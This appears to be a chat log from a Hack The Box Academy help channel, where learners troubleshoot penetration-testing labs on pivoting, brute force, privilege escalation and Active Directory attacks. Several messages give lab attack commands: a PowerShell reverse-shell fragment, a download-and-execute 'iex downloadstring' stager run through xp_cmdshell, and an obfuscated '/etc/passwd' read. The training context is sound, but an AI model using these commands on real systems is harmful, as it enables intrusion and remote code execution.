yea you could be on port 1080 because that's the default port for this or you could try set the port manually with 1080:socks

your screenshot uses port 9050, no?

yeah saw it too, weird

in my proxychains4.conf there is only socks5 127.0.0.1 1080 though

got it.....

proxychains4 uses proxychains.conf ?????? not proxychains4.conf???

umm that'd be kinda stupid but not impossible

im doing login brute force module

oh nvm its giving me false positives for some reason..

this is the cmd i used

very close to being correct, but the smallest details matter

so its not correct? ://

delete the command?

idk what is wrong here tbh..

check form name is correct

i've changed log-in to login but still no :(

i've got it thanks

Nice 💪

I need help with the broken auth skill assessment I've altered session ID's I've tried narrowing down my wordlist and Brute forcing sending one request every 10 seconds. Ive tried altering session ID's AND changing my user agent in the same request, but i keep getting the same error, and i'm not sure why.

hello i am stuck on USING THE METASPLOIT FRAMEWORK MSF Components Modules qustions when i tru to use my wokstation and use metasplit and use the EternalRomance and run but it show Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. what should i do and wrong?

Uhh? Is it normal that module/115/section/1124 box goes to https instead of http?

It keeps redirecting to HTTPS

Which makes me unable to go to the webpage

weird

It's strange, because in the pervious part it did work 😛

Restarting the machine, hopefully it works.

Ok it works now. Strange bug, anyone knows why it does this?
Now I am curious what the problem was 🙂

curious, just started it and same problem as you🙃

Hahaha very weird.

Hi guys, attempting to do a Academy lab/exercise with Bloodhound however the tagets for attacks have changed. Resetting the "Target" machine does nothing. Any way to reset the other machines that are targets I can go after?

When you restart the lab, all the machines in it restart.

weird as one of the attack paths is not listed like it was last week. hmm. Any thoughts?

the table showing the attack methods are different when I run the lab...something must be broken on the reset.

I don't know if anything has been changed in the labs.
If you tell me the module and the section, maybe I can help you and give you a hint how I solved it.

ahhhh damn it, i know whats up. I read /typed something wrong

All is good, thanks guys! #needmorecoffee

Hey guys how do you deal with burnout and excecive learning?

hello i am stuck on USING THE METASPLOIT FRAMEWORK MSF Components Modules qustions when i tru to use my wokstation and use metasplit and use the EternalRomance and run but it show Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. what should i do and wrong?

someone could help me? idk what am i doing wrong

should I spawn a shell?

hey guys, im currently doing "getting started" module, is anyone available for quick question?

This is one of the best modules in the platform!!
Big Thanks to the ones who created it: @blissful verge and @LTNB0B

maybe i can help

can I DM you?

ye

─[httpd@parrot]─[~/Downloads]
└──╼ $ sudo apt install freerdp2-shadow-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 libfreerdp2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
 libwinpr-tools2-2 : Depends: libwinpr2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.

damn it. Trying to get xfreerdp working

sudo apt-get install aptitude

sudo aptitude install freerdp2-x11

https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/

That worked instantly

Thanks man

been finicing with this for like half a hour

😄

what makes aptitude work ? What's the theory behind this?

I do not know exactly, but maybe that helps
https://wiki.debian.org/Aptitude

You never ran openssl with sudo

hi, can I dm you for some help with this module?

i found other way to get a flag, did u solve it tho?

Any luck? Stuck here. Was able to make it through the first time and access the fatty-client-new, but after resetting the box no luck...
https://academy.hackthebox.com/module/113/section/2164

Linux Local Privilege Escalation - Skills Assessment. I dont know what to do to get flag3. can someone give a nudge?

I am working through the socat redirection with a reverse shell section of the pivoting tunneling and port forwarding module. What is the best way to get the payload onto the target host(internal windows machine) for this? I used a dynamic port forward and log in via rdp with proxychains, to then use powershell to download the payload to the target, after I moved the payload to the pivot host with scp. I am sure that there are many ways to do this but I am wondering what everyone's preferred way, or what the best way might be?

inb4 madf0x says ligolo-ng

unintended way :3

you mean

u found it?

I could really use a nudge for AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I managed to get a shell on the SQL01 machine, but the Administrator user doesn't seem to have a Desktop folder. I tried moving mimikatz to the machine, but it won't fire.... Running low on ideas here

"C:\Users\Administrator\Desktop\flag.txt" in SLQ01

Can I DM you to avoid too many spoilers here?

https://academy.hackthebox.com/achievement/89408/182 if u dont believe me

where is the help chat?

Green bubble bottom right
https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

bro I trust you. I was just saying i did it unintended way lol

mind if i ask you how?

how comes sometimes you have to do apt-get and other times its just apt install

old conventions vs new conventions

https://itsfoss.com/apt-vs-apt-get-difference/

Simply said, you can use both

ok thanks

any reason i cant see ftp running in the attacking ftp section of attacking common services?

might not be running on default port

nah its not running on any

had to refresh the ip like 3 times then it showed up

I remember having issues with that one, had to bounce it a couple of times

also i know what the user is but no matter what i use to crack the password i cant get in

ive tried crackmapexec for smb hydra for ftp and ssh as well as medusa

then you haven't found the right vector yet

wdym by vector?

attack vector

someone i dmd had used hydra to get the password

and it worked fine

well yes

im using the lists in the module

you do need hydra at some point. but you need more info before

i understand ftp isnt on the default port

and u need to add that

but other than that idk what i could be missing

well I'm pretty sure any list you have doesn't contain the password

keep in mind, they always try to showcase everything they taught

ok

thanks

In the Pivoting, Tunneling, Port Forwarding module, Socat bind shell: I am not sure how to troubleshoot this issue with my handler, any ideas?

not sure, but I doubt socat can handle a meterpreter session

Is something with the module wrong?

it's the exact example they give

lemme check

Check LHOST

ignore my comment on socat handling meterpreter, didn't quite understand how it was supposed to work. instead it looks like the meterpreter payload that you executed on the windows host is broken. how'd you generate that?

There is no LHOST in the payload options

and I have not executed a payload yet, I am just attempting to start the multihandler

You set a LPORT but no LHOST?

LHOST gives an "unknown data store option"

it might figure out the interface itself given the RHOST I guess?

these are the options

How often will I ever use this bind shell anyway? I remember the TCM course said that he has only used a bind shell like one time on an engagement. Do you ever use it for the rest of the course/exam?

I see people saying in the discord if I search this section that they just only use reverse shell

my theory as to what's going on (it's been a while, so not sure on this):
you need to execute the windows payload first, so that it listens on port 8443.
Then socat
Then multihandler

Right now multihandler sends the stage to the windows host but the windows host hasn't opened a port yet (cause no payload executed). Therefore returns connection refused which isn't a valid meterpreter session ofc

personally, I haven't ever used bind shells unless specifically asked to by a module. but I suppose they exist for a reason

bind shells are mostly for historical knowledge purposes

or long term persistence on a jump host that is utterly blind.

😄

used to be a time where firewalls were not very prevalent and people didnt really track connections and using a proxy was already considered advanced stealth so there was a lot of emphasis on scrubbing IP from logs and records for stealth. In those days you'd want to have a bind shell cause you could connect it from anywhere and just not log the connection. If you used a reverse shell your IP would have to be built in somewhere and thus could expose you.

that makes a lot of sense, thanks for the clarification 🙂

As inbound firewalls and the ease of setting up a hosting server became more common, reverse shells rose up to be the dominant stealth strategy instead and became the de facto standard

i just experienced some problems with connection of my VM to openvpn, is there a problem ?

seasonal challange

You should ask here #1080884182336675872

If you do not have access, then read #welcome

This isn't the place to ask #1080884182336675872 : if you can't see it follow instructions in #welcome

thanks a lot

thanks a lot

Hello ! I'm stuck in the password attack module again in the hard lab. I have mounted the vhd file and i'd like to know how to crack the passphrase ? any hint pls ?

There is a x2john that let's you pass it off to john

yes i tried this, with the mutated list and i found nothing

Try a different list

Perhaps it uses a weak password that can be cracked using a simpler list from seclists

owww

simple list

i'll try

Did Microsoft ever patch the "vulnerability" allowing Printspoofer to work? The way I understand it is the "vulnerability" is actually just how SeImpersonate privileged accounts are intended to operate, therefor there won't actually be a patch for Printspoofer, just a CVE explaining it. I'm guessing Windows created a security patch in order to recognize the code used to exploit this privilege. Is this true? Am I on the right track here?

What module is this for?

Attacking Enterprise Networks. I'm working on the reporting aspect.

Ah well then Google is a friend

¯_(ツ)_/¯

Not finding anything concrete on google. That's why I'm asking here.

idr exactly but it isnt totally unusual for there to be a vulnerability with a process and get a CVE but the only patch is at most making it not default behavior

another hint ?

Nope use the password lists in SecLists

One or more contain the answer

oups, ok

Is it risky to connect to the HTB instance via SSH from my personal operating system?

you mean via the vpn?

No, I mean just using SSH from the terminal of my pc

No need for vpn to connect via ssh, as the instances have public ip

okay well its safe because you cant

I mean, I do it all the time

ah the docker instances?

Yes

yeah should be relatively safe

id still be using a VM at least

Is there a real reason or you just use it cause you feel safer?

What could be compromised?

I'm a newbie 2nd day basically & stuck in the module Linux FUNDAMENTALS with 0/1 instances left but it is stuck on waiting to start; I cant get it to close the instance machine who do I ask for help? It is still saying Waiting to start... after 3 hours

Don't bother with that, the instance will close itself automatically after some time

Okay, TY!

Hi, I am doing the module : Windows Attacks & Defense section : Print Spooler & NTLM Relaying.

In this section we use impacket-ntlmrelayx that exploits Zerologon but the course doesn't explain why it is necessary. Can someone epxlain pls ? :3
Thx

cause its objectively safer to be using a VM then to not.

I wouldn't worry about it too much though

It's an isolated environment, so of course the safe would be greater or equal, but I was asking why? What am I risking if I use my main system to connect to it? Cause I have sat there and thought about it, there is not much anyone could do to my system anyway is it? I might be wrong, but I think even HTB staff/sys admins who manage those instances, couldn't do much at all even if they wanted, let alone other potential malicious users

its your gamble

its generally ill advised to be using your host for any sort of hacking tasks

its probably fine, you do you

i found the password of the vhd file in the lab hard password attack module, i tried to open it with guestmount but i think it does'nt work because i use wsl? any help

unfortunately the answer is dont use wsl

wsl is extremely unreliable

I have no choice 😅

vm? pwnbox?

or its a vhd. just mount natively

true

@sterile hawk - @surreal rain

hello need help

have you tried asking your question before pinging admin and sr. moderator?

i want an article aboy how to bee Staff

https://www.hackthebox.com/join-us

ok thx you man

ping sweep?

then you need to look around the webserver a bit more

try with other pivot tools then

or other scanning tools

ping sweeps are also usually best to do from the end host you have access to though

cause most tunnels cant proxy icmp

you can always try a connect scan sweep with nmap though. Or crackmapexec if you suspect windows hosts

basically you just need to try more things

Upload a statically compiled nmap binary to the jump box and scan from there

Oh wait madfox said that

is this normal?

Hi, I am stuck in the module attack to common servers in the DNS part I do not understand what you want me to do and the truth is that I am very stuck if someone can help me.

The !root means you can’t run it as root

But you could run it as any other user on the box

ah true

I didnt remember

ty

wasnt one of my suggestions but yup totally viable as well

You said sweep with nmap so I thought that’s what you implied 🤷‍♂️

https://academy.hackthebox.com/module/51/section/1590 Linux Privilege Escalation -- sudo -- just to ask am I suppose the get root give the poc they provide in the section?

because the target machine hasn't gcc and either unzip, ||the machine is an ubuntu 20.04, which is exploitable with that script||

ah yeah I meant like connect scan. Can do a sweep of say just port 80 and determine if hosts are up or down based on the responses.

not perfect but another tool in the belt

You don't have to compile anything. Look further down in the module. There is another possibility

I haven't done the module in a while, but nc -z with a for loop works, in a pinch.

yea i got it

I did it with other exploit now trying the sudo bypass, I am able to run ncdu as root, but not to get a root shell

after learning the web requests module will i be able to do anything

can i do labs i mean

Hello guys.
Could anyone please help me understand what this question is asking for:
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
It is in Footprinting/DNS section https://academy.hackthebox.com/module/112/section/1069

Do they want us to find the fqdn of the nameserver?

I did go over some of the past comments about this question, but I am still having a hard time figuring out what exactly they are asking for.

Thanks!

Yes, the question is confusing.
Yes, it is about the FQDN from the name server

Gotcha.
Thanks for the clarification!

where the best place yall think i should start coding ?

the #welcome channel

I used to utilize a page to train coding

is the expression used to use correct? lol

https://www.hackerrank.com/

I was able to find the solution but i had a follow-up question.
shouldn't the dig cmd work if we used the fqdn of the nameserver instead of the ip provided after the @ symbol?

I also used this one https://www.codewars.com/

htb is not an approved TLD. Therefore, you must specify an authoritative server.

ohhhhh.
Thanks again for clarifying the issue.

Thankkssssss mannnnnn

hey can i ask a question
if my ip address was leaked is it a big problem and how do i know if its leaked if anyone knows please tell me

depends, you likely dont. and also off topic for this channel

read #rules and #welcome to verify your account and see the rest of the server

alr thank you

bro i got in a bad situation

u use vpn or without

I can give u some pages to check

that would be great

https://www.whatismyip.com/ https://www.whatismyipaddress.com/

ah shit it says your location may be exposed

thats normal

but is it a problem like can it do any damage other than see my location

off topic

verify your account and ask in a better channel

im doing an account

just copy ur ip

and paste it in googlew

if there is any info about ur ip

but yea just verify ur account and ask in the proper channel

Can we please stay on topic otherwise I’ll just hand out mutes.

ty

module: command injection
section: Advanced command obfuscation

Does anyone know why they are grepping for "33" in the following command?

 echo -n 'cat /etc/passwd | grep 33' | base64

www-data default user ID

its really not important, do whatever you'd like instead basically

I'm a newbie 2nd day basically & stuck in the module Linux FUNDAMENTALS with 0/1 instances left but it is stuck on waiting to start; I cant get it to close the instance machine who do I ask for help? It is still saying Waiting to start... after 3 hours

clear cookies and refresh the page and then of nothing contact support

TY

Clearing cookies worked!

sweet

good luck learning 👍

Can someone help on AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. , I am logged in with xp_cmdshell enabled and I have tried many times to get a powershell shell but no results, i know there is a PE technique and getting a shell, but I need to shell in the first place

I used one from revshells.com

i get such errors [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '10.10'.

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near 'nop'. [-] ERROR(SQL01\SQLEXPRESS): Line 1: The identifier that starts with '$client = New-Object System.Net.Sockets.TCPClient('10.10.15.35',445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0' is too long. Maximum length is 128.

what shell are you trying to use?

powershell

are you sending a reverse shell back to your machine or the Parrot box?

to my machine

I had to send it back to the Parrot box.

Are you referring to pwnbox or is it a box that you jump to in that assessment

Its the attackbox they give you, not quite the same as a pwnbox

the attack boxes they provide are usually just an old pwnbox

so looks different

Yeah I would imagine its pretty much the same, but I just ssh into it, no gui

YmFzZTY0IGlzIHlvdXIgZnJpZW5k

Just use a powershell stager for it.

Something like:

powershell -c iex(new-object net.webclient).downloadstring('http://127.0.0.1/shell.ps1')

Then just host the rest of the code in shell.ps1, so you don't bump up against the character limit.

module: Command Injection
Section: Advanced command obfuscation

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

I cant seem to find the solution to this - anyone able to give me a nudge on this?

VW5mb3J0dW5hdGVseSBkaWRuJ3Qgd29yayAgYXMgd2VsbA==

https://academy.hackthebox.com/module/51/section/480

Linux Privilege Escalation -- Skills Assessment

someone for sanity check?

Ive got 8 minutes

doesn't not seem to be working as well

SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35/shell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'. SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http://10.10.15.35//shell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'. SQL> xp_cmdshell powershell -c iex(new-object net.webclient).downloadstring('http:%2F%2F10.10.15.35%2Fshell.ps1') [-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '%'.

Can someone help me with Linux PrivEsc module kernel exploit? Runnign the exploit shows : version `GLIBC_2.34' not found

it isnt 2.34

iirc it really doesn't like single quotes, there's a way to encode powershell commands though 😉

hhmm tbut that's what pops up when i ran the exploit. And it says use the same exploit..

my bad i thought u was in other question

To be more specific, C programs compiled on glibc 2.34 aren't entirely backwards compatible. There should be a copy of gcc on the remote machine you can use instead

just copy the exploit

compile it and run it

that feeling

nvm, i got it. Thanks @zinc marsh

Y’all ever redo an entire module? I’m thinking of redoing the binary exploitation module. I dunno if I’m just stupid or bad at learning. 😢

I went back and reread and practiced some of the NMAP stuff again. I thought I had a good deal of experience having completed the Offensive Pentesting path on Tryhackme, but I realized that HTB Academy had significantly more information and techniques compared to what I've been used to using.

I was told coming here from Tryhackme that the main complaint was the "wall of text" each module was comprised of, but to be honest that works for me, it just means taking notes and redoing some sections to reinforce it. Overall I think it's a great way of learning!

Better than not having any detail and a "read the entire man page" approach that THM pushes.

What works for me is taking notes in detail on what I'm reading, but then also taking key points from those notes and putting them in a cheatsheet.

I doubt you're stupid or bad at learning, what matters is you're putting in the effort 👍

did you get it figured out?

just 2 more to finish the path

nice

how long it take u

tbh im finding the same thing, i learned alot of this ages ago through variety of different sources , just finished my degree now trying to push myself alot more but im finding most the modules i've touched on so far im already familiar with but will randomly get a few pages on things i havnt done before

like i've used sql injection plenty of times, after doing the module finding a bunch of other ways i could of been utilizing it

Seriously, I'm doing the SMB footprinting module right now, and it's almost sickening how much of this was left out of my previous THM experience!